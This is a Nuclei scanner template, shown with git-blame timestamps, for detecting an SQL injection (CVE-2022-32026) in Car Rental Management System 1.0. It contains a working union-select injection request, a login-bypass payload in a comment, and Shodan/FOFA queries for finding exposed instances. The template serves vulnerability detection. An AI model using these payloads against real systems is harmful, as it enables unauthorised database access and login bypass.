nuclei-templates/http/cves/2022/CVE-2022-32026.yaml

66 lines
2.7 KiB
YAML
Raw Normal View History

2022-08-02 09:59:49 +00:00
id: CVE-2022-32026
2022-07-31 21:11:07 +00:00
info:
name: Car Rental Management System 1.0 - SQL Injection
2022-07-31 21:11:07 +00:00
author: arafatansari
severity: high
2022-07-31 21:11:07 +00:00
description: |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.
2022-07-31 21:11:07 +00:00
reference:
2022-08-02 09:23:41 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
2022-08-02 10:03:29 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32028
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
2023-07-11 19:49:27 +00:00
cve-id: CVE-2022-32026
cwe-id: CWE-89
epss-score: 0.01426
epss-percentile: 0.8625
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
2022-07-31 21:11:07 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: car_rental_management_system_project
product: car_rental_management_system
shodan-query:
- http.html:"Car Rental Management System"
- http.html:"car rental management system"
2024-05-31 19:23:20 +00:00
fofa-query: body="car rental management system"
comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project
2022-08-01 12:42:37 +00:00
variables:
num: "999999999"
2022-07-31 21:11:07 +00:00
http:
2022-07-31 21:11:07 +00:00
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-01 12:42:37 +00:00
username={{username}}&password={{password}}
2022-07-31 21:11:07 +00:00
- |
2022-08-02 10:03:29 +00:00
GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1
2022-07-31 21:11:07 +00:00
Host: {{Hostname}}
2022-08-02 09:23:41 +00:00
skip-variables-check: true
host-redirects: true
2022-07-31 21:11:07 +00:00
max-redirects: 2
2023-07-11 19:49:27 +00:00
2022-07-31 21:11:07 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-01 12:42:37 +00:00
- '{{md5({{num}})}}'
2022-07-31 21:11:07 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100f8ecc7eb539922392b444de3befc31151565d5d517fe639b2d39dfe287bfa519022021858fc6ea793ea95aca5f933240ee25abeb4170f9f7c2665fe4dfc49fdd3cb4:922c64590222798bb761d5b6d8e72950